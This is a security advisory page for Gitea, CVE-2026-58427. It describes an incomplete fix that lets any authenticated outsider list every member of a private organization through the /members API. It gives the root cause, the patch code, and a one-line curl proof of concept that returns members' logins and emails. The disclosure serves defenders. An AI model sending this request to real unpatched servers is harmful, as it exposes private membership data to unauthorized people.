Skip to content

Gitea: Private org member list leaked via /members API endpoint — incomplete fix for PR #38145

Moderate severity GitHub Reviewed Published Jul 13, 2026 in go-gitea/gitea • Updated Jul 21, 2026

Package

gomod gitea.dev (Go)

Affected versions

< 1.27.0

Patched versions

1.27.0

Description

Summary

PR #38145 fixed ListPublicMembers and IsPublicMember but missed
ListMembers. Any authenticated user can enumerate ALL members
(not just public ones) of a private organization.

Affected Versions

<= v1.26.4 (latest) and main branch

Root Cause

routers/api/v1/org/member.go — ListMembers():

// Missing check:
if !organization.HasOrgOrUserVisible(ctx,
ctx.Org.Organization.AsUser(), ctx.Doer) {
ctx.APIErrorNotFound()
return
}

Proof of Concept

Setup: privateorg (private), alice = member, bob = outsider

Bob lists ALL members of private org

curl -s "http://gitea/api/v1/orgs/privateorg/members"
-H "Authorization: token BOB_TOKEN"

Result: HTTP 200

[{"login":"alice","email":"alice@test.com",...}]

Expected: HTTP 404

Note

This is an incomplete fix variant of PR #38145.
That PR fixed public_members endpoints only.
ListMembers (/orgs/{org}/members) remains unpatched.

Fix

Add to ListMembers():
if !organization.HasOrgOrUserVisible(ctx,
ctx.Org.Organization.AsUser(), ctx.Doer) {
ctx.APIErrorNotFound()
return
}

References

@bircni bircni published to go-gitea/gitea Jul 13, 2026
Published to the GitHub Advisory Database Jul 21, 2026
Reviewed Jul 21, 2026
Last updated Jul 21, 2026

Severity

Moderate

EPSS score

Weaknesses

Exposure of Sensitive Information to an Unauthorized Actor

The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. Learn more on MITRE.

Incorrect Authorization

The product performs an authorization check when an actor attempts to access a resource or perform an action, but it does not correctly perform the check. Learn more on MITRE.

CVE ID

CVE-2026-58427

GHSA ID

GHSA-prr9-9mp4-5gp2

Source code

Credits

Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.